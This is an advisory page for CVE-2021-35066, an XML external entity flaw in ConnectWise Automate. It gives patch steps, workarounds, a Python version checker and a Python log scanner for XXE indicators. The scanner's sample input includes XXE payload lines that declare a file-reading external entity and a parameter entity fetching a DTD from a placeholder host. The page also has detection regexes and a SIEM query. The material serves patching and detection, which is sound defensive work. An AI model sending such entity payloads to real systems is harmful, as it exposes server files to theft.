CVE-2021-35066
📋 TL;DR
This CVE describes an XML External Entity (XXE) vulnerability in ConnectWise Automate that allows attackers to read arbitrary files from the server filesystem. It affects ConnectWise Automate installations before version 2021.0.6.132. Organizations using vulnerable versions of this remote monitoring and management software are at risk.
💻 Affected Systems
- ConnectWise Automate
📦 What is this software?
ConnectWise Automate is a remote monitoring and management (RMM) platform used by IT service providers to administer endpoints.
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of sensitive files from the server, potentially including configuration files that contain credentials, escalating to full server compromise, lateral movement and access to the wider network.
Likely Case
Unauthorized file disclosure including configuration files, logs, and potentially sensitive data stored on the server.
If Mitigated
Limited impact with proper network segmentation and file system permissions, though sensitive data exposure may still occur.
🎯 Exploit Status
XXE vulnerabilities typically have low exploitation complexity. No public proof of concept is known for this CVE, but the vulnerability class is well understood and is likely weaponized in targeted attacks.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2021.0.6.132 or later
Vendor Advisory: https://home.connectwise.com/securityBulletin/60cc8c63508a120001cb6e8d
Restart Required: Yes
Instructions:
1. Back up your ConnectWise Automate installation and database.
2. Download the latest patch from the ConnectWise portal.
3. Run the installer with administrative privileges.
4. Restart the ConnectWise Automate services.
5. Verify that the update completed successfully.
🔧 Temporary Workarounds
Disable XML external entity processing
Configure XML parsers to disable external entity resolution
Configuration depends on specific XML parser implementation. Consult ConnectWise documentation for parser-specific settings.
Network segmentation
Restrict network access to the ConnectWise Automate server
Implement firewall rules to limit inbound connections to trusted IP addresses only
🧯 If You Can't Patch
- Implement strict network access controls to limit who can reach the ConnectWise Automate interface
- Monitor file access logs for unusual read patterns and implement file integrity monitoring
🔍 How to Verify
Check if Vulnerable:
Check the ConnectWise Automate version in the web interface under Help > About, or examine the installed version in Programs and Features (Windows). Any version older than 2021.0.6.132 is vulnerable.
Check Version:
In the ConnectWise Automate web interface, navigate to Help > About. On the Windows server, check Programs and Features or the registry key HKEY_LOCAL_MACHINE\SOFTWARE\LabTech\Install.
Verify Fix Applied:
Verify the version is 2021.0.6.132 or later in the web interface or installed programs list.
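The version check above is easy to get wrong in a script: comparing version strings as text puts 2021.0.6.99 after 2021.0.6.132. The following is an added example (not code from the advisory or from ConnectWise) that compares an Automate version string numerically against the fixed build 2021.0.6.132. The optional registry reader uses the key the advisory names; the advisory does not say which value under that key holds the version, so the value name is a parameter and an assumption here.

```python
"""Added example: is a ConnectWise Automate version older than the fixed build?

Not part of the advisory or of ConnectWise's own tooling. The fixed version
comes from the advisory; the registry value name is an assumption.
"""
import re
from typing import Optional, Tuple

FIXED_VERSION = "2021.0.6.132"  # fixed build stated in the advisory
REGISTRY_KEY = r"SOFTWARE\LabTech\Install"  # key named in the advisory (under HKLM)


def parse_version(version: str) -> Tuple[int, ...]:
    """Split a dotted version string into a tuple of ints.

    String comparison is wrong here ('2021.0.6.99' > '2021.0.6.132' as text
    because '9' > '1'), so every component is converted to an integer.
    A trailing non-numeric suffix such as '-beta' on a component is ignored.
    """
    parts = []
    for component in version.strip().split("."):
        match = re.match(r"\d+", component)
        if not match:
            raise ValueError(f"invalid version component {component!r} in {version!r}")
        parts.append(int(match.group()))
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is strictly older than the fixed version."""
    inst = parse_version(installed)
    fix = parse_version(fixed)
    # Pad the shorter tuple with zeros so '2021.0.6' compares as '2021.0.6.0'.
    width = max(len(inst), len(fix))
    inst = inst + (0,) * (width - len(inst))
    fix = fix + (0,) * (width - len(fix))
    return inst < fix


def read_version_from_registry(value_name: str) -> Optional[str]:
    """Read a version string from HKLM\\SOFTWARE\\LabTech\\Install.

    ASSUMPTION: the advisory does not name the value that holds the version,
    so the caller supplies it. Returns None when not running on Windows or
    when the key or value is absent, so the caller can fall back to Help > About.
    """
    try:
        import winreg  # only available on Windows
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REGISTRY_KEY) as key:
            value, _ = winreg.QueryValueEx(key, value_name)
            return str(value)
    except OSError:
        return None


if __name__ == "__main__":
    # Constructed sample versions; on a real server feed in the Help > About value.
    for sample in ("2021.0.5.100", "2021.0.6.99", "2021.0.6.132", "2021.0.7.1"):
        print(sample, "VULNERABLE" if is_vulnerable(sample) else "fixed")
```

Run it on the server with the Help > About string, or pass the registry value name once it has been confirmed in the ConnectWise documentation; a result of None from the registry reader means fall back to the web interface rather than assume the host is patched.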
📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors in application logs
- Multiple failed XML parsing attempts
- File read operations from unexpected processes
Network Indicators:
- XML payloads containing external entity references in HTTP requests
- Outbound connections from ConnectWise server to unexpected external IPs
SIEM Query:
source="connectwise-automate" AND (message="*XXE*" OR message="*external entity*" OR message="*DOCTYPE*")
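The indicators and the SIEM query above are string matches, and a bare "*DOCTYPE*" match also fires on benign documents such as XHTML with a PUBLIC DTD. The following is an added example (not code from the advisory or from ConnectWise) that applies the same indicators to captured request bodies and application log lines, but rates a DOCTYPE that declares an external or parameter entity higher than a DOCTYPE on its own. The sample lines are constructed for the example; the file and host names in them are placeholders.

```python
"""Added example: score log lines and request bodies for the XXE indicators
listed in the advisory. Not part of the advisory; sample data is constructed."""
import re
from typing import Dict, List

# Network indicator: a DOCTYPE that declares an entity with an external
# identifier (SYSTEM or PUBLIC), or a parameter entity (%name), is far more
# specific to XXE than a DOCTYPE declaration by itself.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+%?\s*[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAMETER_ENTITY_RE = re.compile(r"<!ENTITY\s+%\s*[\w.-]+", re.IGNORECASE)
# Log indicator: parser errors that mention entities or failed XML parsing.
PARSE_ERROR_RE = re.compile(
    r"xml (parse|parsing) (error|fail)|external entity|undefined entity",
    re.IGNORECASE)


def classify(line: str) -> List[str]:
    """Return the indicator names that a single line triggers (empty if none)."""
    reasons: List[str] = []
    if EXTERNAL_ENTITY_RE.search(line):
        reasons.append("external-entity-declaration")
    if PARAMETER_ENTITY_RE.search(line):
        reasons.append("parameter-entity")
    if DOCTYPE_RE.search(line) and not reasons:
        # DOCTYPE alone is common in benign XML/XHTML; report it at low severity.
        reasons.append("doctype-present")
    if PARSE_ERROR_RE.search(line):
        reasons.append("parser-error")
    return reasons


def scan(lines: List[str]) -> List[Dict]:
    """Scan lines in order and return one finding per line that triggers anything."""
    findings = []
    for number, line in enumerate(lines, 1):
        reasons = classify(line)
        if not reasons:
            continue
        high = "external-entity-declaration" in reasons or "parameter-entity" in reasons
        findings.append({"line": number,
                         "severity": "high" if high else "low",
                         "reasons": reasons})
    return findings


# Constructed sample input: one benign request, one request declaring an external
# entity, one benign XHTML DOCTYPE, one parser error, one parameter-entity DOCTYPE.
SAMPLE_LINES = [
    '2021-06-18T10:01:02Z POST /api HTTP/1.1 body=<?xml version="1.0"?><request><id>42</id></request>',
    '2021-06-18T10:01:05Z POST /api HTTP/1.1 body=<?xml version="1.0"?>'
    '<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///PLACEHOLDER/path">]><r>&ext;</r>',
    '2021-06-18T10:01:09Z POST /upload HTTP/1.1 body=<!DOCTYPE html PUBLIC '
    '"-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html/>',
    '2021-06-18T10:01:10Z ERROR XML parsing error: undefined entity in request body',
    '2021-06-18T10:01:14Z POST /api HTTP/1.1 body=<!DOCTYPE r '
    '[<!ENTITY % p SYSTEM "http://PLACEHOLDER.invalid/x.dtd"> %p;]>',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

When porting this back to a SIEM, keep the two tiers: alert on the entity-declaration matches, and treat DOCTYPE-only and parser-error matches as context to correlate with the outbound-connection indicator rather than as alerts on their own.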